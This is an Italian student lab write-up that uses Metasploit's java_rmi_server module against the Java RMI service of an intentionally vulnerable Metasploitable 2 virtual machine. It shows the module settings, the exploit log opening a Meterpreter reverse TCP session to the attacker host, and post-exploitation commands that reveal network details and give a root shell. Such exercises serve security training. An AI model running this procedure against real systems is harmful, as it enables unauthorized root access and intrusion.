

PROGETTO W16D4

Il progetto ci porterà a sfruttare la vulnerabilità del servizio aperto sulla porta 1099 di Metasploitable 2. Java-RMI, una tecnologia che consente alle applicazioni Java di comunicare tra di loro attraverso la rete. Qui sotto lascio la traccia.

Traccia

La nostra macchina Metasploitable presenta un servizio vulnerabile sulla porta 1099 – Java RMI. Si richiede allo studente, ripercorrendo gli step visti nelle lezioni teoriche, di sfruttare la vulnerabilità con Metasploit al fine di ottenere una sessione di Meterpreter sulla macchina remota.

I requisiti dell'esercizio sono:

- La macchina attaccante (KALI) deve avere il seguente indirizzo IP: 192.168.11.111-La macchina vittima (Metasploitable) deve avere il seguente indirizzo IP: 192.168.11.112
- Una volta ottenuta una sessione remota Meterpreter, lo studente deve raccogliere le seguenti evidenze sulla macchina remota:
 - 1) configurazione di rete;
 - 2) informazioni sulla tabella di routing della macchina vittima
 - 3) altro...

Configurazione di rete delle macchine virtuali

L'esercizio richiede un cambio di indirizzo per entrambe le macchine, Kali Linux e Metasploitable 2. Prima di procedere apportiamo le modifiche sui foglii interfaces.

```
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
source /etc/network/interfaces.d/*

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
#iface eth0 inet dhcp
iface eth0 inet static
address 192.168.11.111/24
netmask 255.255.255.0
gateway 192.168.1.1
```

Network configuration Kali

```
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
#iface eth0 inet dhcp
address 192.168.11.112/24
netmask 255.255.255.0
network 192.168.1.3
broadcast 192.168.1.255
gateway 192.168.1.1
```

Network configuration Metasploitable 2

Attivazione Metasploit

Per mezzo di search cerchiamo il modulo che corrisponderà a quanto inserito: java_rmi. Ci serve il modulo sulla riga 1, che termina con default configuration code execution. Dopo averlo selezionato ci verrà assegnato il payload di default java/meterpreter/reverse_tcp.

Name	Current Setting	Required	Description
HTTPDELAY	10	yes	Time that the HTTP Server will wait for the payload request
RHOSTS	192.168.11.112	yes	The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT	1099	yes	The target port (TCP)
SRVHOST	0.0.0.0	yes	The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT	8080	yes	The local port to listen on.
SSL	false	no	Negotiate SSL for incoming connections
SSLCert		no	Path to a custom SSL certificate (default is randomly generated)
URIPATH		no	The URI to use for this exploit (default is random)

Payload options (java/meterpreter/reverse_tcp):

Name	Current Setting	Required	Description
LHOST	192.168.11.111	yes	The listen address (an interface may be specified)
LPORT	4444	yes	The listen port

Exploit target:

Id	Name
0	Generic (Java Payload)

Exploit e testing controllo acquisito

La shell di Meterpreter è stata creata con successo. Possiamo infatti notare una session 1 in attesa dei nostri comandi. Partiamo con il comprendere quale sia la configurazione di rete del bersaglio.

```
msf6 exploit(multi/misc/java_rmi_server) > exploit
[*] Started reverse TCP handler on 192.168.11.111:4444
[*] 192.168.11.112:1099 - Using URL: http://192.168.11.111:8080/8ALMGbU2ExSGSMe
[*] 192.168.11.112:1099 - Server started.
[*] 192.168.11.112:1099 - Sending RMI Header ...
[*] 192.168.11.112:1099 - Sending RMI Call ...
[*] 192.168.11.112:1099 - Replied to request for payload JAR
[*] Sending stage (57971 bytes) to 192.168.11.112
[*] Meterpreter session 1 opened (192.168.11.111:4444 → 192.168.11.112:55137) at 2024-02-23 07:02:31 -0500
```

```
meterpreter > ifconfig

Interface 1
=====
Name       : lo - lo
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ::

Interface 2
=====
Name       : eth0 - eth0
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 192.168.11.112
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe0d:4d11
IPv6 Netmask : ::

meterpreter > 
```

Ovviamente abbiamo disposizione diverse manovre a seconda delle esigenze. Ad esempio possiamo visualizzare la tabella di routing del bersaglio.

```
meterpreter > route
```

IPv4 network routes

Subnet	Netmask	Gateway	Metric	Interface
127.0.0.1	255.0.0.0	0.0.0.0		
192.168.11.112	255.255.255.0	0.0.0.0		

IPv6 network routes

Subnet	Netmask	Gateway	Metric	Interface
::1	::	::		
fe80::a00:27ff:fe80:4d11	::	::		

routing table

Le cartelle e i loro permessi.

Mode	Size	Type	Last modified	Name
040666/rw-rw-rw-	4096	dir	2012-05-13 23:35:33 -0400	bin
040666/rw-rw-rw-	1024	dir	2012-05-13 23:36:28 -0400	boot
040666/rw-rw-rw-	4096	dir	2010-03-16 18:55:51 -0400	cdrom
040666/rw-rw-rw-	13540	dir	2024-02-23 06:49:32 -0500	dev
040666/rw-rw-rw-	4096	dir	2024-02-23 06:49:38 -0500	etc
040666/rw-rw-rw-	4096	dir	2010-04-16 02:16:02 -0400	home
040666/rw-rw-rw-	4096	dir	2010-03-16 18:57:40 -0400	initrd
100666/rw-rw-rw-	7929183	fil	2012-05-13 23:35:56 -0400	initrd.img
040666/rw-rw-rw-	4096	dir	2012-05-13 23:35:22 -0400	lib
040666/rw-rw-rw-	16384	dir	2010-03-16 18:55:15 -0400	lost+found
040666/rw-rw-rw-	4096	dir	2010-03-16 18:55:52 -0400	media
040666/rw-rw-rw-	4096	dir	2010-04-28 16:16:56 -0400	mnt
100666/rw-rw-rw-	49081	fil	2024-02-23 06:49:39 -0500	nohup.out
040666/rw-rw-rw-	4096	dir	2010-03-16 18:57:39 -0400	opt
040666/rw-rw-rw-	4096	dir	2024-01-26 16:49:50 -0500	privateshare
040666/rw-rw-rw-	0	dir	2024-02-23 06:49:19 -0500	proc
040666/rw-rw-rw-	4096	dir	2024-02-23 06:49:39 -0500	root
040666/rw-rw-rw-	4096	dir	2012-05-13 21:54:53 -0400	sbin
040666/rw-rw-rw-	4096	dir	2010-03-16 18:57:38 -0400	srv
040666/rw-rw-rw-	0	dir	2024-02-23 06:49:20 -0500	sys
040666/rw-rw-rw-	4096	dir	2024-02-18 16:31:52 -0500	test_metasploit
040666/rw-rw-rw-	4096	dir	2024-02-23 07:02:31 -0500	tmp
040666/rw-rw-rw-	4096	dir	2010-04-28 00:06:37 -0400	usr
040666/rw-rw-rw-	4096	dir	2010-03-17 10:08:23 -0400	var
100666/rw-rw-rw-	1987288	fil	2008-04-10 12:55:41 -0400	vmlinuz

directories

Informazioni sul sistema operativo per mezzo di sysinfo.

```
meterpreter > sysinfo
Computer      : metasploitable
OS            : Linux 2.6.24-16-server (i386)
Architecture : x86
System Language : en_US
Meterpreter   : java/linux
meterpreter >
```

OS
informations

Possiamo anche creare una shell per interagire con Metasploitable 2. In questo modo abbiamo accesso ai comandi sul terminale di Linux, come whoami, oppure cat. Quando abbiamo finito con il nostro attacco lanciamo più volte exit per uscire.

```
meterpreter > shell
Process 1 created.
Channel 1 created.
meterpreter >
```

shell

```
whoami
root
```

```
cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"
```

Read files